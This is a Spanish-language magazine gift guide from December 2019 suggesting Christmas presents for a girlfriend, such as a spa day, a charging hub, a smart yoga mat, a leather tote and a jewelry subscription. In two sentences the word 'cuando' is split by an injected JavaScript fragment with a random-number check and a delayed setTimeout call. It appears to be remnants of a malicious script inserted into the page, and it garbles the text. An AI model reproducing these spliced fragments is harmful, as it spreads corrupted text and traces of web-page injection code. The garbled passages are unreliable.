Sorpréndela con estos regalos

    Sorpréndela con estos regalos

    Haz de su navidad algo especial.

    Autor: Elizabeth Rivera 9 diciembre, 2019


    FOTO: Shutterstock

     

    Algunas ideas para regalarle a tu novia esta navidad.

     

    ¿Todos los años le regalas una blusa? O peor aún, ¿algo para la cocina? Olvídate de ese tipo de regalos o los de último momento en los que terminas comprándole cualquier cosa. 

     

    Este año sorprende a esa mujer especial, la que te hace suspirar o  temblar cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando te llega a la nariz el aroma de su perfume. Te damos una lista de regalos con los que vas a lucirte como nunca y además, vas a demostrarle que es muy importante para ti. Te aseguramos que son infalibles. 

     

    Un día de spa

     

     

    Qué mejor que regalarle un día relajante en el que la consentida sea ella. Créenos, si preparas este regalo, te va a amar, pues se dará cuenta de lo mucho que te importa su bienestar. Puede ser algo sencillo como regalarle una sesión de manicure y pedicure, un tratamiento de mascarillas faciales o algo más lujoso como un fin de semana entero en un spa. Si te quieres lucir, te recomendamos el Spa del hotel Rodavento en Valle de Bravo. Reserva aquí.

     

    Elago 3 in 1 Charging Hub

     

     

    Si tu mujer es fanática de los productos Apple, este es un regalo ideal para ella. Con este artefacto puede cargar su teléfono, reloj y audífonos de forma más sencilla y en conjunto. Te aseguramos que le va a encantar. Cómpralo aquí.

     

     

    Backslash Fit Smart Yoga Mat

     

    Si ella es una yogui de corazón y no falta nunca a sus clases, este es el mejor regalo que le puedes dar. Este tapete de yoga se enrolla y desenrolla solo, cuenta con una aplicación que da rutinas de yoga que pueden escucharse en bocinas externas o en el celular, además, es suave y súper seguro, pues entre más se suda, más antiderrapante se vuelve. Pídelo ya para que llegue a tiempo.

     

     

    The Day Market Tote

     

     

    Angelina Jolie tiene una y ya con eso deberías convencerte que es un regalo de lujo. Esta bolsa de uso diario de la marca EVERLANE está elaborada con cuero italiano de primerísima calidad. Es perfecta para cargar todo lo que ella necesita y hacerlo con clase. Adquiérela aquí

     

     

    Switch

     

     

    ¿Imaginas la cara que pondrá cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando le regales esta membresía? Switch te permite escoger tres planes para que ella obtenga joyas de diseñadores como Chanel y Hermes durante todo el año. La membresía Gold le dará una joya por mes, la Platinum dos, y la Black tres piezas. Con este regalo vas a quedar como un verdadero caballero. Adquiérela aquí.

     

     

    Regalos para él, estas son opciones de MODA INSPIRADA EN CINE Y TV, PERFECTA PARA REGALAR ESTA TEMPORADA

     

     

     

    Temas relacionados con esta nota: , , ,

Haz de su navidad algo especial.